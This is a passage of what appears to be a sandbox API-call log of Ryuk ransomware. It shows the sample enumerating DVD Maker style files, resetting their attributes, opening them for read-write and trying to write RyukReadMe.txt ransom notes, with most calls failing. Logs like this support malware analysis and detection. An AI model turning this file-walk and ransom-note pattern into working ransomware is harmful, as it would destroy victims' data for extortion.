dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.560] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.560] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.560] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.560] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.560] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.561] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.561] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.561] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.561] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.561] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.561] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.561] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.561] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.561] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.561] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.561] SetLastError (dwErrCode=0x0) [0133.561] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.562] GetLastError () returned 0x5 [0133.562] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.562] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.562] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.563] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.563] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.563] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.563] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0133.563] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.563] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.563] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.563] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.563] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.564] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png", dwFileAttributes=0x80) returned 0 [0133.564] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.564] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.564] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.564] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.564] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.564] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png", dwFileAttributes=0x80) returned 0 [0133.565] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\decorative_rule.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.565] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.565] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.565] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.565] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.565] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.565] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.565] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.566] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.566] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.566] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.566] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.566] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.566] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.566] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.566] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.566] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.567] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.567] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.567] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.567] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.567] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.567] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.567] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.567] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.567] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.567] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.567] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.567] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.568] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.568] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.568] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.568] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.568] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.568] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.568] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.568] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.568] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.568] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.569] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.569] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.569] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png", dwFileAttributes=0x80) returned 0 [0133.569] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\vintage.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.569] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.569] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.569] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.569] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.570] SetLastError (dwErrCode=0x0) [0133.570] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.572] GetLastError () returned 0x5 [0133.572] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.572] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.572] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.572] SetLastError (dwErrCode=0x0) [0133.572] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.573] GetLastError () returned 0x5 [0133.573] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.573] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.573] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.575] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.575] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.575] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.575] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png", dwFileAttributes=0x80) returned 0 [0133.575] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\720x480blacksquare.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.575] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.576] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.576] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.576] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.576] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png", dwFileAttributes=0x80) returned 0 [0133.576] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\nextmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.576] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.576] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.576] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.576] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.576] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png", dwFileAttributes=0x80) returned 0 [0133.577] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\nextmenubuttoniconsubpictur.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.577] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.577] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.577] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.577] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.577] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv", dwFileAttributes=0x80) returned 0 [0133.578] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\notes_loop.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.578] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.578] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.578] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.578] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.578] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.578] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\notes_loop_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.578] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.578] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.578] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.578] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.579] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png", dwFileAttributes=0x80) returned 0 [0133.579] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\parentmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.579] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.579] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.579] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.579] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.579] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png", dwFileAttributes=0x80) returned 0 [0133.579] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\parentmenubuttoniconsubpict.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.579] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.579] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.579] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.579] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.580] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png", dwFileAttributes=0x80) returned 0 [0133.580] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\performance.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.580] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.580] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.581] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.581] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.581] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png", dwFileAttributes=0x80) returned 0 [0133.581] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\perf_scenes_mask1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.581] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.581] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.581] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.581] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.581] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png", dwFileAttributes=0x80) returned 0 [0133.581] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\perf_scenes_subpicture1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.582] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.582] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.582] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.582] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.582] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png", dwFileAttributes=0x80) returned 0 [0133.582] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\previousmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.582] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.582] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.582] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.582] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.582] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png", dwFileAttributes=0x80) returned 0 [0133.583] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\previousmenubuttoniconsubpi.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.583] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.583] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.583] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.583] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.583] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png", dwFileAttributes=0x80) returned 0 [0133.584] CreateFileW (lpFileName="C:\\Program Files\\DVD 